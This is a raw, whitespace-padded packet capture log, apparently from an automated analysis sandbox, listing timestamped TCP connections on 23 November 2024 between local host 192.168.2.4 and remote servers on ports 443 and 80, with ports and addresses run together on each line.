                                                                                                                                                                                  Nov 23, 2024 14:47:08.947946072 CET49813443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:08.948014021 CET4434981313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:08.948308945 CET49813443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:08.948327065 CET4434981313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:08.949038982 CET4434981513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:08.949516058 CET49815443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:08.949552059 CET4434981513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:08.949933052 CET49815443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:08.949944019 CET4434981513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:08.963799000 CET4434981713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:08.970200062 CET49817443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:08.970235109 CET4434981713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:08.970582962 CET49817443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:08.970587969 CET4434981713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:09.265840054 CET4434981413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:09.265922070 CET4434981413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:09.266232967 CET49814443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:09.266264915 CET49814443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:09.266278982 CET4434981413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:09.266290903 CET49814443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:09.266295910 CET4434981413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:09.269489050 CET49822443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:09.269534111 CET4434982213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:09.269618034 CET49822443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:09.269804001 CET49822443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:09.269817114 CET4434982213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:09.380894899 CET4434981313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:09.380968094 CET4434981313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:09.381159067 CET49813443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:09.381357908 CET49813443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:09.381400108 CET4434981313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:09.381429911 CET49813443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:09.381447077 CET4434981313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:09.381722927 CET4434981613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:09.381782055 CET4434981613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:09.383699894 CET49816443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:09.383749008 CET49816443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:09.383765936 CET4434981613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:09.383775949 CET49816443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:09.383781910 CET4434981613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:09.384352922 CET49823443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:09.384427071 CET4434982313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:09.384524107 CET49823443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:09.385297060 CET49823443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:09.385329008 CET4434982313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:09.386831045 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:09.386872053 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:09.386956930 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:09.387135029 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:09.387151003 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:09.395282984 CET4434981513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:09.395447016 CET4434981513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:09.395545006 CET49815443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:09.395720005 CET49815443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:09.395745993 CET4434981513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:09.395776033 CET49815443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:09.395793915 CET4434981513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:09.398236990 CET49825443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:09.398288965 CET4434982513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:09.398380041 CET49825443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:09.398525000 CET49825443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:09.398544073 CET4434982513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:09.411003113 CET4434981713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:09.411057949 CET4434981713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:09.411140919 CET49817443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:09.414289951 CET49817443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:09.414314985 CET4434981713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:09.414326906 CET49817443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:09.414334059 CET4434981713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:09.417042017 CET49826443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:09.417064905 CET4434982613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:09.417143106 CET49826443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:09.417268991 CET49826443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:09.417283058 CET4434982613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:09.800781965 CET4434982120.12.23.50192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:09.800893068 CET49821443192.168.2.420.12.23.50
                                                                                                                                                                                  Nov 23, 2024 14:47:09.802552938 CET49821443192.168.2.420.12.23.50
                                                                                                                                                                                  Nov 23, 2024 14:47:09.802570105 CET4434982120.12.23.50192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:09.802815914 CET4434982120.12.23.50192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:09.814363003 CET49821443192.168.2.420.12.23.50
                                                                                                                                                                                  Nov 23, 2024 14:47:09.855391026 CET4434982120.12.23.50192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:10.472987890 CET4434982120.12.23.50192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:10.473014116 CET4434982120.12.23.50192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:10.473078966 CET4434982120.12.23.50192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:10.473092079 CET49821443192.168.2.420.12.23.50
                                                                                                                                                                                  Nov 23, 2024 14:47:10.473129988 CET4434982120.12.23.50192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:10.473171949 CET49821443192.168.2.420.12.23.50
                                                                                                                                                                                  Nov 23, 2024 14:47:10.473193884 CET49821443192.168.2.420.12.23.50
                                                                                                                                                                                  Nov 23, 2024 14:47:10.510819912 CET4434982120.12.23.50192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:10.510868073 CET4434982120.12.23.50192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:10.510902882 CET49821443192.168.2.420.12.23.50
                                                                                                                                                                                  Nov 23, 2024 14:47:10.510921955 CET4434982120.12.23.50192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:10.510948896 CET4434982120.12.23.50192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:10.510952950 CET49821443192.168.2.420.12.23.50
                                                                                                                                                                                  Nov 23, 2024 14:47:10.511004925 CET49821443192.168.2.420.12.23.50
                                                                                                                                                                                  Nov 23, 2024 14:47:10.511233091 CET49821443192.168.2.420.12.23.50
                                                                                                                                                                                  Nov 23, 2024 14:47:10.511265993 CET4434982120.12.23.50192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:10.511292934 CET49821443192.168.2.420.12.23.50
                                                                                                                                                                                  Nov 23, 2024 14:47:10.511308908 CET4434982120.12.23.50192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:10.875690937 CET4972480192.168.2.4199.232.210.172
                                                                                                                                                                                  Nov 23, 2024 14:47:10.995829105 CET8049724199.232.210.172192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:10.995918036 CET4972480192.168.2.4199.232.210.172
                                                                                                                                                                                  Nov 23, 2024 14:47:11.064397097 CET4434982213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:11.064946890 CET49822443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:11.064961910 CET4434982213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:11.065556049 CET49822443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:11.065561056 CET4434982213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:11.118679047 CET4434982513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:11.119671106 CET49825443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:11.119720936 CET4434982513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:11.120014906 CET49825443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:11.120034933 CET4434982513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:11.164516926 CET4434982313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:11.165678978 CET49823443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:11.165730000 CET4434982313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:11.166131020 CET49823443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:11.166146994 CET4434982313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:11.169800043 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:11.176476955 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:11.176517010 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:11.177109957 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:11.177115917 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:11.205028057 CET4434982613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:11.205355883 CET49826443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:11.205367088 CET4434982613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:11.205728054 CET49826443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:11.205733061 CET4434982613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:11.508456945 CET4434982213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:11.508528948 CET4434982213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:11.508615971 CET49822443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:11.511823893 CET49822443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:11.511823893 CET49822443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:11.511848927 CET4434982213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:11.511861086 CET4434982213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:11.523185968 CET49828443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:11.523221970 CET4434982813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:11.523296118 CET49828443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:11.523432016 CET49828443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:11.523447990 CET4434982813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:11.554814100 CET4434982513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:11.554991961 CET4434982513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:11.555082083 CET49825443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:11.555082083 CET49825443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:11.555152893 CET49825443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:11.555202961 CET4434982513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:11.557529926 CET49829443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:11.557606936 CET4434982913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:11.557694912 CET49829443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:11.557817936 CET49829443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:11.557856083 CET4434982913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:11.607816935 CET4434982313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:11.607876062 CET4434982313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:11.607954979 CET49823443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:11.608083963 CET49823443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:11.608119011 CET4434982313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:11.608136892 CET49823443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:11.608154058 CET4434982313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:11.610382080 CET49830443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:11.610405922 CET4434983013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:11.610477924 CET49830443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:11.610593081 CET49830443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:11.610599995 CET4434983013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:11.614172935 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:11.614233017 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:11.614296913 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:11.614443064 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:11.614458084 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:11.614469051 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:11.614474058 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:11.616267920 CET49831443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:11.616290092 CET4434983113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:11.616410971 CET49831443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:11.616538048 CET49831443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:11.616554976 CET4434983113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:11.652872086 CET4434982613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:11.652941942 CET4434982613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:11.653330088 CET49826443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:11.653378010 CET49826443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:11.653387070 CET4434982613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:11.653395891 CET49826443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:11.653399944 CET4434982613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:11.655333996 CET49832443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:11.655366898 CET4434983213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:11.655451059 CET49832443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:11.655558109 CET49832443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:11.655570030 CET4434983213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:13.321341038 CET4434982813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:13.322031021 CET49828443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:13.322046995 CET4434982813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:13.322505951 CET49828443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:13.322510958 CET4434982813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:13.359680891 CET4434982913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:13.360006094 CET49829443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:13.360057116 CET4434982913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:13.360369921 CET49829443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:13.360388994 CET4434982913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:13.494591951 CET4434983113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:13.495354891 CET49831443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:13.495402098 CET4434983113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:13.495882988 CET49831443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:13.495898008 CET4434983113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:13.546644926 CET4434983013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:13.547005892 CET49830443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:13.547014952 CET4434983013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:13.547389030 CET49830443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:13.547394037 CET4434983013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:13.584539890 CET4434983213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:13.585166931 CET49832443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:13.585180044 CET4434983213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:13.585863113 CET49832443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:13.585866928 CET4434983213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:13.767795086 CET4434982813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:13.767867088 CET4434982813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:13.768094063 CET49828443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:13.768120050 CET49828443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:13.768132925 CET4434982813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:13.768142939 CET49828443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:13.768151045 CET4434982813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:13.771101952 CET49833443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:13.771145105 CET4434983313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:13.771408081 CET49833443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:13.771408081 CET49833443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:13.771450043 CET4434983313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:13.809269905 CET4434982913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:13.809442043 CET4434982913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:13.809747934 CET49829443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:13.809855938 CET49829443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:13.809855938 CET49829443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:13.809875011 CET4434982913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:13.809887886 CET4434982913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:13.811795950 CET49834443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:13.811825991 CET4434983413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:13.811909914 CET49834443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:13.812012911 CET49834443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:13.812026024 CET4434983413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:13.943221092 CET4434983113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:13.943322897 CET4434983113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:13.943433046 CET49831443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:13.946340084 CET49831443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:13.946374893 CET4434983113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:13.946403027 CET49831443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:13.946434975 CET4434983113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:13.953341961 CET49835443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:13.953407049 CET4434983513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:13.953474045 CET49835443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:13.953649044 CET49835443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:13.953668118 CET4434983513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:14.000113010 CET4434983013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:14.000176907 CET4434983013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:14.000235081 CET49830443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:14.000359058 CET49830443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:14.000370979 CET4434983013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:14.000384092 CET49830443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:14.000391960 CET4434983013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:14.002619028 CET49836443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:14.002650976 CET4434983613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:14.002746105 CET49836443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:14.002916098 CET49836443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:14.002928972 CET4434983613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:14.038343906 CET4434983213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:14.038419962 CET4434983213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:14.038467884 CET49832443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:14.038569927 CET49832443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:14.038585901 CET4434983213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:14.038594961 CET49832443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:14.038599968 CET4434983213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:14.041320086 CET49837443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:14.041364908 CET4434983713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:14.041430950 CET49837443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:14.042157888 CET49837443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:14.042171001 CET4434983713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:15.525918007 CET4434983413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:15.526504993 CET49834443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:15.526530981 CET4434983413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:15.527034998 CET49834443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:15.527045012 CET4434983413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:15.616584063 CET4434983313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:15.617130041 CET49833443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:15.617166042 CET4434983313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:15.617628098 CET49833443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:15.617635965 CET4434983313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:15.717206001 CET4434983613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:15.717911959 CET49836443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:15.717932940 CET4434983613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:15.718372107 CET49836443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:15.718377113 CET4434983613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:15.742526054 CET4434983513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:15.743062019 CET49835443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:15.743088007 CET4434983513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:15.743477106 CET49835443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:15.743484974 CET4434983513.107.246.63192.168.2.4
